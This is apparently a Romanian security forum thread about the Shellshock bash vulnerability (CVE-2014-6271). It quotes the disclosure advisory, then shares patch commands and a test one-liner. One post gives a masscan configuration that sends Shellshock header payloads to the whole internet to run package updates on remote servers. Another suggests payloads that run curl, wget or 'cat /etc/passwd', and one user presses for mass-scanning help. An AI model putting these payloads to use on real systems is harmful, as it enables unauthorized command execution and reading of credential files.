Bash - Remote Code Execution

[SirGod]

Urat.

Mailing list: oss-security - CVE-2014-6271: remote code execution through bash

Pentru cei lenesi:

Bash supports exporting not just shell variables, but also shell

functions to other bash instances, via the process environment to

(indirect) child processes. Current bash versions use an environment

variable named by the function name, and a function definition

starting with “() {” in the variable value to propagate function

definitions through the environment. The vulnerability occurs because

bash does not stop after processing the function definition; it

continues to parse and execute shell commands following the function

definition. For example, an environment variable setting of

VAR=() { ignored; }; /bin/id

will execute /bin/id when the environment is imported into the bash

process. (The process is in a slightly undefined state at this point.

The PATH variable may not have been set up yet, and bash could crash

after executing /bin/id, but the damage has already happened at this

point.)

The fact that an environment variable with an arbitrary name can be

used as a carrier for a malicious function definition containing

trailing commands makes this vulnerability particularly severe; it

enables network-based exploitation.

So far, HTTP requests to CGI scripts have been identified as the major

attack vector.

A typical HTTP request looks like this:

GET /path?query-param-name=query-param-value HTTP/1.1

Host: Example Domain

Custom: custom-header-value

The CGI specification maps all parts to environment variables. With

Apache httpd, the magic string “() {” can appear in these places:

* Host (“www.example.com”, as REMOTE_HOST)

* Header value (“custom-header-value”, as HTTP_CUSTOM in this example)

* Server protocol (“HTTP/1.1”, as SERVER_PROTOCOL)

The user name embedded in an Authorization header could be a vector as

well, but the corresponding REMOTE_USER variable is only set if the

user name corresponds to a known account according to the

authentication configuration, and a configuration which accepts the

magic string appears somewhat unlikely.

In addition, with other CGI implementations, the request method

(“GET”), path (“/path”) and query string

(“query-param-name=query-param-value”) may be vectors, and it is

conceivable for “query-param-value” as well, and perhaps even

“query-param-name”.

The other vector is OpenSSH, either through AcceptEnv variables, TERM

or SSH_ORIGINAL_COMMAND.

Other vectors involving different environment variable set by

additional programs are expected.

Source: oss-security - Re: CVE-2014-6271: remote code execution through bash

[florin_darck]

Errata Security: Bash bug as big as Heartbleed

[Nytro]

Un fix rapid e deja disponibil. apt-get update/yum update si ce mai vreti voi.

[tromfil]

# rpm
sudo yum update -y bash
# Debian
sudo apt-get -y install --only-upgrade bash

Upgrade doar la bash ca s? nu strica?i ceva.

[Andrei]

Pentru teste: BashSmash/Shellshock (CVE-2014-6271) Website Check

[florinul]

Pai si care e criteriul.pt serverele vuln ? Cum le gasesti un dork ceva ?

[Nytro]

Request HTTP cu User-Agent/Cookie/Referrer setat ca functie ce face ping/curl/wget de exemplu. Sau cat /etc/passwd. Sau afiseaza ceva, orice.

[florinul]

Un exemplu concret nytro ? Sa zicem ca avem serverul 1.2.3.4

[Silviu]

#InfoSec good dead fairy
#Original from shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = InfosecFairy
http-header = Cookie:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Host:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y
http-header = Referer:() { :; }; apt-get update -y; apt-get upgrade -y; yum update bash -y

Using bashbug to patch bashbug

[Nytro]

Aveti aici 6 articole detaliate despre aceasta problema: https://rstforums.com/forum/tutoriale-engleza.rst

[florinul]

Era mai simplu daca spunea cineva ... asa trebuie sa staunsa descifrez una alta

[TheTime]

Era mai simplu daca spunea cineva ... asa trebuie sa staunsa descifrez una alta

Esti de groaza. Ai postul lui @Silviu in care ai un exemplu de "exploatare", nu poti sa inlocuiesti comenzile de acolo cu un ping catre website-ul tau, apoi sa te uiti peste loguri?

[eckar]

Nu mai bine te chinui tu sa în?elegi vulnerabilitatea?

Din punctul meu de vedere e mai grav ?i decât heartbleed din simplul motiv ca poate fi exploatat de aproape oricine, chiar ?i de florinul ^ ?i ?ansele de reu?it? sunt mult mai mari

Sent from my phone using Tapatalk

Te-ai inselat, tocmai a intrebat intr-un alt post cum se foloseste si de ce nu-i functioneaza ))

[florinul]

Chiar nu ne poate ajuta nimeni sa il facem masscan ?

[romanu]

1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team , restul e cancan

[SirGod]

Chiar nu ne poate ajuta nimeni sa il facem masscan ?

Pentru ce vrei sa faci mass-scan? Ai cumva o retea mare in administrare si vrei sa vezi ce servere sunt afectate pentru a remedia? Daca da, te ajut eu.

[florinul]

Nu vroiam pentru a face o parerr despre impactul pe care il are vulnrrabilutatea

[eckar]

Nu vroiam pentru a face o parerr despre impactul pe care il are vulnrrabilutatea

CLAR!

[awnly3jhc2g]

# rpm
sudo yum update -y bash
# Debian
sudo apt-get -y install --only-upgrade bash

Upgrade doar la bash ca s? nu strica?i ceva.

"The patch can be bypassed! For details see https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23 "

[Nytro]

A fost fixat si acesta.

[gugustiuc]

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

a dat boala in toti cu bash-ul

https://github.com/EvanK/shocktrooper